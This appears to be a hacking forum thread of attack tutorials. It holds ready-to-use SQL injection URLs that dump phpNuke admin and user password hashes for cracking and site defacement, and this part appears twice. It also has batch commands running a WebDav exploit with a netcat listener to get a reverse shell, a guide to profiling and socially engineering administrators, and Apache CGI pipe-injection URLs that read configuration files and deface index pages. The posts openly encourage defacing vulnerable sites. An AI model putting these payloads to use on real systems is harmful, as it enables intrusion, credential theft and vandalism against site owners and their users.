[whiskah]

Defacing phpNUke sites Using Multiple SQL INJECTION TECHNIQUES
Although this is very old, I was surprised to see thousands of sites
vulnerable even security sites and some hacking sites using phpNUke..

TOOLS:
1. Google,Browser
2. MD5 password cracker
Cain and Abel
Lepton's Crack
Rainbowcrack
mdcrack
3. Wordlist


STEPS:

1. Google search strings:this are just examples(this is just how I did), use your imagination..
allinurl:/modules.php?name=Downloads
allinurl:/modules.php?name=Web_links
allinurl:/modules.php?name=Sections
allinurl:/modules.php?name=Reviews
2. goto site then copy paste the strings that starts with '&' so the query for
downloads module sample would be hxxp://phpnukesite/modules.php?name=Downloads&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

weblinks module sample would be hxxp://phpnukesite/modules.php?name=Web_links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

Sections module sample would be
hxxp://phpnukesite/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

Reviews module sample would be
hxxp://phpnukesite/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*

3. If you cracked the admin hash then login thru http://phpnukesite/admin.php
4. Respect and don't damage too much, Just inform them to patch
6. You will be amazed how many sites you can deface
7. Some alternative queries are listed below:

[DOWNLOADS MODULE]
--admin,hash---
&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

--names,logins,passes
&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

---all pseudos of users,pass---6.9
&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*

---6.9logins, ID, encrypted passwords, names, emails and levels of all reg users---
&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
---------------------------------------------------------------
allinurl:/modules.php?name=Web_Links
[WEBLINKS MODULE]
--user,hash----
&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

--hash--
&l_op=viewlink&cid=2 UNION Select aid,pwd,1 from nuke_authors --

----admin username-------
&l_op=viewlink&cid=2 UNION Select 1,aid,pwd from nuke_authors --

--hash---
&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors

----Resteer towards the password----
&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Sections

[SECTIONS MODULE]
--admin hash---
&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
---user,hash---
&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Reviews
[REVIEWS MODULE]

&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*Defacing phpNUke sites Using Multiple SQL INJECTION TECHNIQUES
Although this is very old, I was surprised to see thousands of sites
vulnerable even security sites and some hacking sites using phpNUke..

TOOLS:
1. Google,Browser
2. MD5 password cracker
Cain and Abel
Lepton's Crack
Rainbowcrack
mdcrack
3. Wordlist


STEPS:

1. Google search strings:this are just examples(this is just how I did), use your imagination..
allinurl:/modules.php?name=Downloads
allinurl:/modules.php?name=Web_links
allinurl:/modules.php?name=Sections
allinurl:/modules.php?name=Reviews
2. goto site then copy paste the strings that starts with '&' so the query for
downloads module sample would be http://phpnukesite/m...wdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--
weblinks module sample would be http://phpnukesite/modules.php?name=Web_li...0nuke_authors/*
Sections module sample would be http://phpnukesite/m...%20nuke_authors
Reviews module sample would be http://phpnukesite/modules.php?name=Review...0nuke_authors/*
3. If you cracked the admin hash then login thru http://phpnukesite/admin.php
4. Respect and don't damage too much, Just inform them to patch
6. You will be amazed how many sites you can deface
7. Some alternatice queries are listed below:

[DOWNLOADS MODULE]
--admin,hash---
&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

--names,logins,passes
&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

---all pseudos of users,pass---6.9
&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*

---6.9logins, ID, encrypted passwords, names, emails and levels of all reg users---
&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
---------------------------------------------------------------
allinurl:/modules.php?name=Web_Links
[WEBLINKS MODULE]
--user,hash----
&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

--hash--
&l_op=viewlink&cid=2 UNION Select aid,pwd,1 from nuke_authors --

----admin username-------
&l_op=viewlink&cid=2 UNION Select 1,aid,pwd from nuke_authors --

--hash---
&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors

----Resteer towards the password----
&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Sections

[SECTIONS MODULE]
--admin hash---
&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
---user,hash---
&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Reviews
[REVIEWS MODULE]

&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*

[JohnAcres]

Hacking WebDav

I'm going to do this tutorial like a science lab because I like that format. I haven't really read around that much so I'm not sure if this has been posted before or not or if this is even needed.

Purpose: Get a shell on the host.

Tools/Materials: wb.exe (the WebDav exploit by kralor, www.coromputer.net)
nc.exe (netcat)

Procedure:
1. Open up netcat, nc -L -vv -p 1434
2. Make a batfile for wb.exe to get all the paddings in order to make easier.

This will cover all the paddings just replace %1 with the target computer and %2 with the computer that u want the victim to connect to
wb %1 %2 1434 0
wb %1 %2 1434 1
wb %1 %2 1434 2
wb %1 %2 1434 3
wb %1 %2 1434 4
wb %1 %2 1434 5
wb %1 %2 1434 6
wb %1 %2 1434 7
wb %1 %2 1434 8
wb %1 %2 1434 9
wb %1 %2 1434 10
wb %1 %2 1434 11
wb %1 %2 1434 12
wb %1 %2 1434 13
wb %1 %2 1434 14
wb %1 %2 1434 15
wb %1 %2 1434 16
wb %1 %2 1434 17
wb %1 %2 1434 18
wb %1 %2 1434 19
wb %1 %2 1434 20
wb %1 %2 1434 0
wb %1 %2 1434 1
wb %1 %2 1434 2
wb %1 %2 1434 3
wb %1 %2 1434 4
wb %1 %2 1434 5
wb %1 %2 1434 6
wb %1 %2 1434 7
wb %1 %2 1434 8
wb %1 %2 1434 9
wb %1 %2 1434 10
wb %1 %2 1434 11
wb %1 %2 1434 12
wb %1 %2 1434 13
wb %1 %2 1434 14
wb %1 %2 1434 15
wb %1 %2 1434 16
wb %1 %2 1434 17
wb %1 %2 1434 18
wb %1 %2 1434 19
wb %1 %2 1434 20
wb %1 %2 1434 203
wb %1 %2 1434 71
wb %1 %2 1434 190
wb %1 %2 1434 194
wb %1 %2 1434 200
wb %1 %2 1434 -3

3. Run the bat and watch nc for the shell.

Thats about it... not hard, not complicated, or really new but I thought it might help someone out.

[Logan]

people. this is for tutorials... not requesting tutorials...

some of these are nice for new tallent, good job guys
about the one using echo...
you can just use notepad or any wordprocessor to make life way easier... but if you're in dos or constructing a batch file, that's a very usefull command.....

[NeBoKaDnEzZaR]

Hei Thx a lot for the Web Server Turtorial. :D A really good idea to make it in 2 langauges resoect. I also will make TUT'S here wehn i learned some new. Was a good idea.

Greez NeBo

[TwitcH]

This tut is just a lil something im still working on, hope this helps.




Gathering Information On Your Target V1.6 An Unsecure Team Tutorial

http://unsecure.khgamez.com Author: TwitcH Date:25/03/04

-ContentS-
1: Gathering Basic Information on The Administrator
2: Gaining Your Targets IP Address
3: Finding out the Targets Operating System Type and The Services it is Running
4: Port Scanners Will Help You Uncover Those Holes...
4: Finding Exploits for these Services

ChapteR 1: Gathering Basic Information On the Administrator

Gathering information on the person that runs your target system might seem a bit silly but belive me it can help a damn lot when trying to gain access to the system. One example of this is cracking passwords ie: Your trying to use a dictionary attack on his password hash using an english dictionary when in fact he is actually japanese and so is his password, or another reason this can be very useful is that social engineers can get to know his/her habits/hobbies/interests and work there way into the system by tricking people he works with into giving you access. We'll start by visiting the admins website, take note of the topic of the website this can be a very big clue as to what the admin is interested in (and you could also find other less secure sites he might have a username and password on to try and get his password which might also be the password to his e-mail/server). Also try and grab his e-mail address (even his e-mail addy's name could be a big clue as to what his password is). You can even try slapping his e-mail addy into msn and try to talk to him pretending to be someone he knows or someone interested in what his server is running (just try not to sound too suspicious). Once you know as much as you can about the admin try doing a finger or whois on his website/e-mail (these tools are explained in the mini-tutorials sections on the unsecure site) I think thats about all you can do to find out about the admin (just remember exploiting/cracking isnt the only way into a server).

ChapteR 2: Gaining Your Targets IP Address

This is a very important but relatively easy part of gathering information on the target. You will need the targets IP address to use tools such as Port Scanners, Exploits, Sniffers blablabla... Getting it as i said earlier is a piece of piss, one easy way of doing this is nslookup just go to your commandline and type nslookup "inserthostname here" <(Without The Quotes!!) this should hopefully bring up the hosts IP addy. BUT! this might not be the way into the server you might need to hack the admins personal computer so you will need the admins personal computers IP addy, getting this can be a bit harder. I cant think of any definate way of doing this but there are some tools that you can download that will let you get the IP Address using MSN, ICQ and other programs that use a connection between the two computers.

Chapter 3: Port Scanners Will Help You Uncover Those Holes...

There are lots of different port scanners available for you today, some have millions of options others just do a simple TCP scan. This chapter will just tell you a little about the best ones available and where to get them from.

Nmap:
Nmap can be found at http://www.insecure.org and is a linux based port scanner (although there is a windows port i dont reccomend it due to really slow scanning times).
Nmaps best feature is its amount of scanning options, some of these are:
* Vanilla TCP connect() scanning,
* TCP SYN (half open) scanning,
* TCP FIN (stealth) scanning,
* TCP ftp proxy (bounce attack) scanning,
* SYN/FIN scanning using IP fragments (bypasses packet filters),
* UDP recvfrom() scanning,
* UDP raw ICMP port unreachable scanning,
* ICMP scanning (ping-sweep), and
* Reverse-ident scanning.
* OS Detection

as you can see thats quite a list and very very useful in any hackers eyes ;).

GFI LanGuard Network Security Scanner: http://www.gfi.com
This is a windows based scanner with a nice easy to use gui, this scanner will not only detect OS version, scan the ports and do port range scans, it also looks to see if the target has any security holes!! This lil bugger will scan there computer using the latest exploits/trojan ports and tell you if the target computer is exploitable. This can help a damn lot when gathering information on a target. Once the scanner has found an exploit, it will show you a link to the BugTraq listing for this exploit where you can possibly find out how to exploit this hole.

NetScan Tools Pro 2000: http://www.nwpsw.com
This is a simpler version of a windows GUI based port scanner, but this one has a shitload more options, things like finger, ping, traceroute, WhoIs, SMTP E-mail generator, NetBios Info Lookup and about 10 more... Only thing is this one is not free, you have to pay for it. (although i do think i saw this floating around DC++ ;) )


ChapteR 4: Finding Exploits For The Services

This part is simple, everyone no matter how dumb should be able to find an exploit just try and find out the version of the service you want to exploit open up google and search for "blabla 1.0 exploit" or summin along those lines. Find the exploits compile, read the instructions and attack. Ill write up another tutorial on using some common exploits one day. (just vote for the tutorial you want at unsecure.khgamez.com) Well that just about wraps it up for Version 1 of this tutorial (yes i said version one this thing will get updated and will go into the extreme details of everything ive mentioned in here) so while your waiting for more fuller explanations and techniques for gathering information on your target server head over to unsecure.khgamez.com and fill them boards, post some tutorials and submit some news.
Another way of finding new exploits is to sign yourself up to an exploit mailing list, these can be very helpful on difficult hacks because new exploits are appearing

Anyone wanting to be a part of the unsecure.khgamez.com team should send me an e-mail at illuminati_2600@hotmail.com thank you and happy hacking

[migo]

wow!

[binary_hashes]

hi, all
i m also a new
i want to know the difference between MS03-026 AND MS03-036 Vulneribility
pLeAse i need some guidance

[TheRealGiant]

Not new, but might help someone.

Apache Win32 - 1.3.23 & 2.0.28 Hacking

What you need :
+++++++++++++++

You don't need any tool to make the deface. This vulnerability can be exploited
via a browser.

_____________________________________________________________________________

Lets start...


1.This vulnerability has been exploited on - Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat
file which enables this attack)

When a request for a DOS batch file (.bat or.cmd) is sent to an Apache
web server, the server will spawn a shell interpreter (cmd.exe by
default) and will run the script with the parameters sent to it by the
user. Because no proper validation is done on the input, it is possible
to send a pipe character ('|') with commands appended to it as
parameters to the CGI script, and the shell interpreter will execute
them.


2.Find a webserver running Apache 1.3.23(Win) or Apache 2.0.28-BETA(Win)

(a)To view the httpd.conf file residing in the /conf directory of the
Apache installation, you must copy it into the virtual web root.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf


(b)To view the contents of the C:\ drive create in /htdocs a file containing
the directory listing of the drive.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt


�To make your deface you will use the echo command.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|echo+Defaced bY YOU+>>+..\htdocs\index.html

This will append the string "Defaced bY YOU" to the index.html file residing in
the virtual web root directory.


Thats how this vulnerability can be exploited...